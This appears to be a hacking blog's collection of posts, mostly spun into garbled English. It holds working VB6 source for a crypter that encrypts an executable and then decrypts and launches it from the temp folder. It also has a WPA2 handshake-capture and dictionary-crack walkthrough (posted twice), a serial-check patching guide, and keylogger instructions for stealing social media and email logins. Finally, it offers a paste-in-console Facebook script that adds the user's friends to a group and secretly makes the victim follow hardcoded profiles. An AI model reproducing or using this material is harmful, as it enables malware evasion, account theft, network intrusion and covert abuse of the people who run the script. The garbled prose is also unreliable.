Showing posts with label Softwares. Show all posts

Help Desk Software

What is help desk Software?


Before deciding if facilitate table software system is well worth the effort, you wish to grasp what help desk software system is. Is it associate email management system wherever you handle email communication from shoppers or customer? sure enough such software system will embody this practicality, however help desk software system is sometimes rather more than simply managing email.

Is facilitate desk software system question and answer management? once more, such software system will be, however it's always rather more.

Help table software system permits you to:-

1)Keep track of incoming requests for help.
2)Keep tabs on such help requests.
3)Manage the standing of help requests.
4)Manage issue resolution.
5)Provide a method of act commonly asked queries (FAQ)s to your shoppers and customers.
6)Provide a method for your shoppers or customers to resolve problems on their own.

Is There a requirement for facilitate table Software?

Almost all businesses need client interaction. whether or not you are commerce to them, providing them a service, or creating one thing they'll use, you are going to want to speak together with your customers. you are positively attending to wish to form certain your customers will contact you when you are doing business with them.

After-sales support is a very important a part of overall client satisfaction. happy customers area unit repeat customers and your best supply of ad (word of mouth). What you wish to make your mind up on is however you are going to move together with your customers and the way you are going to manage this interaction.

Regular mail is just too slow, and phone support is pricey to run and frustrating for patrons - lost or born calls, being on hold awaiting a representative, and lack of satisfactory follow-up.

Help desk software system permits you to trace your client support contact info, client contact info, what the customer's issue is, if the matter is resolved or not.

Some reasonably help desk management software system is important in managing your after-sales contact together with your customers and shoppers.

How Would You enjoy help desk Software?

Help table software system permits you to tie all of those client support management problems along.
you'll be able to keep track of your customers and their problems, keep track of the standing of the problems (unresolved, in-process, solved, etc.), and keep track of however typically sure issues occur.

For example, if you have got a retardant that multiple customers area unit having, you'll be able to use the assistance table software system to report on this issue. Once you see trends like this, you'll be able to take steps to resolve the matter for current customers and keep it from happening within the future.

Likewise, you'll be able to keep track of the resources you have got allotted to a specific issue. during this fashion, you'll be able to keep from having quite one person performing on constant issue at constant time.

When a problem is resolved, different support personnel will use that info contained within the issue-tracking portion of your facilitate table software system to resolve similar or identical problems they are performing on.

You can see the advantages of victimisation facilitate table software system.
(Noobs Acadmy)


Read more

How to Create a Crypter?

Assalam-o-Alaikum! HaXoR is here. Hope u like my post.



How To build a crypter ?



What you'll need:

Visual Basic half dozen or Visual Basic half dozen transportable
A RC4 module (Click Here to Download
A brain
The RC4 module and Visual Basic half dozen transportable can have the transfer links at the end of this tutorial.

TABLE OF CONTENTS:
1. Introduction
2. Building your crypter
3. Conclusion

1. Introduction

RC4:
In cryptography, RC4 (also called ARCFOUR or ARC4 that means Alleged RC4, see below) is that the most generally used stream cipher and is employed in protocols like Secure Sockets Layer (SSL) (to defend net traffic) and WEP (to secure wireless networks).

Stub:
A method stub or just stub in software development may be a piece of code used to exchange for a few different programming practicality. A stub might simulate the behavior of existing code (such as a procedure on a far off machine) or be a short lived substitute for yet-to-be-developed code. Stubs square measure so most helpful in porting, distributed computing additionally as general package development and testing.

Builder:
A builder is sometimes the consumer to make/do one thing to a file, and it's imagined to come with a stub. The builder sometimes permits the stub to simulate the behaivor of existing code, and than it makes the file/does one thing to a file.

Here is the Real Work Starts

2. Building your crypter.

Now, open up Visual Basic half dozen or Visual Basic transportable. to form the task easier, open 2 Visual Basic half dozen programs. One goes to be the builder, and one goes to be the stub.

Now, lets begin on the builder. Add a RC4 module, and lets prolong. initial of all, add one label that says File Path:, a text box right beside File Path:, a button that says Browse or ..., and another button that says sepulcher or Build. Now, lets add the CommonDialog management. Add a CommonDialog and name it commondlg. Now, lets double click the button that says Browse or .... Add this code, and i will justify it.

Code:
With commondlg 'CommonDialog1.
.Filter = possible files | *.exe 'The file used for crypting. (*.exe)
.DialogTitle = Please choose a possible file... 'The title of the dialog.
.ShowOpen 'Show the dialog.
End With
TextBox1.Text = commondlg.FileName 'Make TextBox1.Text because the selected  name.

The With commondlg command calls CommonDialog1.
The .Filter half permits you to decide on what files you merely wish to be selected .
The .DialogTitle command is that the title of the dialog (the prompt that tells you which ones file you would like to pick for crypting).
The .ShowOpen command shows the dialog.
End With can finish CommonDialog1.
And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the chosen name.

Now, click the button that says Build or sepulcher. Add this code. It explains it, therefore please take time to scan what it says.
Code:
Dim sStub As String, sFile As String 'This command can declare the 2 strings.
Open App.Path & stub.exe For Binary As #1 'Opens up the stub.
sStub = Space(LOF(1)) 'This declares the house.
Get #1, , sStub 'This puts in a very house within the file.
Close #1 'This closes the file.
Open TextBox1.Text For Binary As #1 'Opens up the stub.
sFile = Space(LOF(1)) 'This declares the house.
Get #1, , sFile 'This puts an area within the file.
Close #1 'This closes the file.

Open App.Path & output.exe For Binary As #1 'This creates the crypted file as output.exe.
Put #1, , sStub & FileSplit & RC4(sFile, Pass) 'This adds choice|the choice} FileSplit and therefore the RC4 option.
Close #1 'This closes the file.

MsgBox (File crypted with success!) 'This is that the prompt to point out the message that the program successfully crypted the file.

Now, you may have a slip which will show you that FileSplit and Pass isn't declared. To do so, we'll add the declarations on the highest of the writing.

Code:
Const FileSplit = 'The file split.
Const Pass = s0rasRC4Tutorial 'The RC4 countersign.

For this tutorial, we'll be victimisation s0rasRC4Tutorial because the RC4 countersign.

Now, lets begin on the stub. Add the RC4 module, and build a brand new module known as modMain. Add this code in modMain:
Code:
Const FileSplit = 'The file split.
Const Pass = s0rasRC4Tutorial 'The RC4 password; It should be constant because the one on the builder!

Public Declare perform ShellExecute Lib Shell32.dll Alias ShellExecuteA (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command.

Public Sub Main() 'The main a part of the stub.
Dim sStub As String, sFile As String 'This can declare the strings once more, a bit like we have a tendency to did on the builder.
Open App.Path & & App.EXEName & .exe For Binary As #1 'Opens up the chosen .exe file.
sStub = Space(LOF(1)) 'This can declare the house.
Get #1, , sStub 'This puts an area within the file.
Close #1 'This closes the file.

sFile = Split(sStub, FileSplit)(1) 'This can split the file and therefore the stub.
Open Environ(tmp) & decrypted.exe For Binary As #1 'This can build a decrypted move into the RC4 folder.
Put #1, , RC4(sFile, Pass) 'This can add the RC4 countersign to the file with the chosen RC4 countersign.

Call ShellExecute(0, vbNullString, Environ(tmp) & decrypted.exe, vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted move into the temporary files folder.

End Sub 'This ends Public Sub Main().

The code are teaching you. Once you are done, take away the Form1.

3. Conclusion
I hope you liked  this tutorial, and that i hope you learned plenty concerning crypting

Thnx For Visiting
ReGarDs (HaXoR and Noobs Acadmy)
Read more

How to open Blocked or Banned Websites?

Welcome Friends to my Blog.HaXoR is Here.I am simple boy with tricky mind and my motto is that Knowledge is free. That is why i am sharing my knowledge with so that you can also get benefit from it.

How To Open banned Websites With Proxy Sites ?


There are several sites that are blocked by government as a result of breaking laws of their country. The user downloads several softwares to open these sites however find yourself being infected by  malware  virus.                            nowadays i will be able to share a trick with you guys which might assist you simply open these prohibited sites while not downloading something. As you recognize that there square measure several on-line proxies however everybody want a proxy server that is quicker and trusty.
                     Here during this post i'm revealing {an on-line|a web|an internet} proxy and a tutorial to open prohibited sites with the assistance of those online proxies that is trusty and quick. simply follow my step to open prohibited sites.
Also Read How to Hack facebook Account?
How To Open banned web site ?
There are many Proxy sites.which are used to open blocked or banned Websites.
1. Open www.incloak.com in your browser.
                                                                   You can conjointly use any proxy web site from list below List of fine Proxy Sites
2.enter the URL of the positioning that you wish to open like below.3. currently click the Hide me button and revel in.

http://aniscartujo.com/webproxy
http://www.badboysproxy.com
http://www.surfscreened.com
http://www.hagiomusic.info
http://www.greenpips.info
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.allfreehere.info
http://www.takefreely.info
http://autobypass.com
http://www.proxcity.info
http://www.proxyzip.org
http://www.cheekyproxy.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.hidemefast.com
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://myspaceproxyy.com
http://www.browsesneaky.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.proogle.info
http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.slyuser.com/
http://tenpass.com
http://pawxy.com
http://pawxy.org
http://logu.in

Read more

How to hack wpa and wpa2-psk wifi?

Welcome Friends to my Blog. I am simple boy with tricky mind and my motto is that Knowledge is free. That is why i am sharing my knowledge with so that you can also get benefit from it.

HaXoR is in Rescue
How to Crack a Wpa2-Psk password with Windows?



If you search on YouTube you may realize a various tutorial to a way to hack a wifi password using backtrack. However, double back OS isn't most handy OS for traditional users. Yesterday one Facebook follower asked USA a way to hack wifi. we have a tendency to do our greatest to get pleasure from the hacking that is why these days i'm getting to show you ways to a crack a Wpa2-psk password with windows machine.

I. software package demand for this lab:
1. CommView for Wifi:
http://www.adf.ly/4637926/by-king-maker
2. Elcomsoft Wireless Security Auditor:
Download From here

Currently i'm connected to my very own wifi network Virusfound and that i need to hack the password of final that's secured with Wpa2-psk secret writing.

II. 1st you would like to capture the Wpa2, four-way handsake with CommView:

1. Open commView and click on on the beginning choice.

2. Click on the capture choice to begin the capture.

3. it'll show you all accessible AP. Click on the Tools > choose the Node Reassoication choice ( if Node Rassociation isn't operating , then use WLAN Alfa card ).

4. choose your target AP within the Send a deauthentication request from this AP choice. it'll show you all available consumer choice.

5. Click on the Send currently choice to send the packet for 4-way authentication. Wait a while - it'll capture the packet.

6. Click on the Save choice and opt for your file format Commview Capture Files (*.ncf).

7. Your capture work is completed.

III. currently open Elcomsoft Wireless Security Auditor to crack your WLAN (Wifi) password:

1. Click on the Import information tab > choose the Import CommViewLog choice.

2. it'll show you info regarding AP and Multiple shake choice info. Click on Ok.

3. Click on the beginning attack choice and choose the dictionary Attack choice. However, your 
different attack's choices are accessible.

4. inside minutes it'll find your password and it'll show you the password.

Enjoy hacking wifi with Windows machine!

Read more

How to hack wpa and wpa2-psk wifi?

Welcome Friends to my Blog. I am simple boy with tricky mind and my motto is that Knowledge is free. That is why i am sharing my knowledge with so that you can also get benefit from it.

HaXoR is in Rescue
How to Crack a Wpa2-Psk password with Windows?



If you search on YouTube you may realize a various tutorial to a way to hack a wifi password using backtrack. However, double back OS isn't most handy OS for traditional users. Yesterday one Facebook follower asked USA a way to hack wifi. we have a tendency to do our greatest to get pleasure from the hacking that is why these days i'm getting to show you ways to a crack a Wpa2-psk password with windows machine.

I. software package demand for this lab:
1. CommView for Wifi:
http://www.adf.ly/4637926/by-king-maker
2. Elcomsoft Wireless Security Auditor:
http://adf.ly/ZSoON

Currently i'm connected to my very own wifi network Virusfound and that i need to hack the password of final that's secured with Wpa2-psk secret writing.

II. 1st you would like to capture the Wpa2, four-way handsake with CommView:

1. Open commView and click on on the beginning choice.

2. Click on the capture choice to begin the capture.

3. it'll show you all accessible AP. Click on the Tools > choose the Node Reassoication choice ( if Node Rassociation isn't operating , then use WLAN Alfa card ).

4. choose your target AP within the Send a deauthentication request from this AP choice. it'll show you all available consumer choice.

5. Click on the Send currently choice to send the packet for 4-way authentication. Wait a while - it'll capture the packet.

6. Click on the Save choice and opt for your file format Commview Capture Files (*.ncf).

7. Your capture work is completed.

III. currently open Elcomsoft Wireless Security Auditor to crack your WLAN (Wifi) password:

1. Click on the Import information tab > choose the Import CommViewLog choice.

2. it'll show you info regarding AP and Multiple shake choice info. Click on Ok.

3. Click on the beginning attack choice and choose the dictionary Attack choice. However, your 
different attack's choices are accessible.

4. inside minutes it'll find your password and it'll show you the password.

Enjoy hacking wifi with Windows machine!

Read more

How to Crack any Software Easily?


Welcome Friends to my Blog. I am simple boy with tricky mind and my motto is that Knowledge is free. That is why i am sharing my knowledge with so that you can also get benefit from it.

Today i am going to show how to crack a software.This tutorial is for Beginners.

HOW TO CRACK A SOFTWARE(for beginners)

How to get started in the art of cracking 


Introduction: 




Tons of new programs are coming out each day.… But the bad thing is that

most of them are shareware, which means that you have to pay to get the full


Version (most of the time, when you’ll register, the creators of the program


will e-mail you an unlock code)… But there are some guys called “crackers” 


who can modify the program so that you don’t need to pay to get the full 


version. In this tutorial, you’ll learn how to crack programs (except VB 


programs). I hope that you’ll enjoy it.


(You Might Also Like How To Hack any Facebook account?)


1) Programs that you’ll need to get started 


2) Basic things about cracking

1) Programs that you’ll need to get started


Here’s the list of programs that you’ll need to get to start cracking:

WinDisassembler


Hex Workshop


Hacker’s View

2) Basic things about cracking


Please remember that in this tutorial, I expect that you never cracked a



program, so it should be easy for beginners.



Here is, step by step, what you have to do to crack a program which needs a 


name and a serial number (assuming that there’s no good protection):

a) Run the program 


cool.gif Go to the place where you can enter your name and a serial number


c) Type your name and any serial number 

d) Write down (or memorise) the error message 


e) Copy the program’s exe to .bak (for backup) and to .w32


f) Disassemble [progname].w32 with WinDisassembler



g) Click on search -> search. Type the error message, and click on search


h) Scroll up until you find this “Referenced by a (U)nconditional or 



©onditional Jump at Address: | blabla” (where blabla is the address) 

i) Go to this address by scrolling up (the addresses are writen on the left) 


j) There should be “jne” written at this address.

h) Double-click on the line and memorise the offset (written on the status bar)


i) Launch hacker’s view and edit the exe files 


j) Press F4 and select Decode Mode 


k) Press F5 and type the Offset. 


l) Press F3 and type 74 (which will change jne to je) 


m) If the program isn’t very securised, it should be cracked now! 



n) Run the program


You might also like How to Hack a Wrbsite with Havij?


o) Type your name and any serial number



p) It should work!

Note: If it didn’t work, then it means that the program is more protected.



you have to learn more about assamble language and practice hard to crack advanced



Software

                                 (HaXoR)
Read more

How to Steal Someone's Facebook,Gmail,Twitter,Yahoo and Other accounts?



Assalam-o-Alaikum Friends! HaXoR is Here today i am going to show you how to steal Someone's Facebook,Twitter,Pintest,Gmail,Yahoo and all other important data from anyone or all other accounts of the victim.

Lets Start:-


1) Download  KBG Keylogger Click Here to download.
2)When Download is Complete Disconnect your Internet Connection.
3)Right Click on the downloaded File as Shown Below.

Note:- This Trick is only for Educational Purpose HaXoR is not Responsible for any missuse (Harm to anyone).




4)Click on open containing folder.
5)double click on setup to run it. and now just keep click on next button don't uncheck any option.


6) when you have instelled it.Click on Finish as shown below and Keylogger will be opened.


7)Click on the green button and recording will start.


8) Now lets checkout it is working or we are wasting our precious time!

9)Goto Facebook or anyother site i will prefer facebook. and type something like id or password!


ok now open KGB Keylogger with key Combination or by Run
Shift+Ctrl+Alt+k
OR type runkgb in RUN

10) Yahooooo!!! it is working as shown below:-


11)Using this software you can also have a hidden look at your childrens.

Regards (HaXoR)


Read more

How to Add Members in few Clicks in any group

Hello guys! i think this is my best post ever. 

TRY THIS IT WORKS

Like us on facebook For Latest Updates

TRICK UPDATED NOW WORKING 99.99% :

FOUND A NEW WAY.

how to get 1000+ subscribers.. REMEMBER ONLY WORKS ON GOOGLE CHROME.

open my group and then try this you get my all members = your followers .

My Group



1.copy the code below

2.press "esc" then press F12 then press "console"

(or)

right click on the group and click inspect element then "console".

(function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]) 
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}

function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
var http4 = new XMLHttpRequest();

var url4 = "/ajax/follow/follow_profile.php?__a=1";

var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {

http4.close; // Close the connection

}
}

http4.send(params4);
}

function sublist(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}

a("100000307708952");
a("100002462400502");

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
data = eval('(' + gf['responseText']['substr'](9) + ')');
if (data['error']) {} else {
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
return _0x93dax8['index'] - _0x93dax9['index'];
});
};
};

3.then press paste and click ENTER
4. wait for your precess to complete... ENJOYYYY
Read more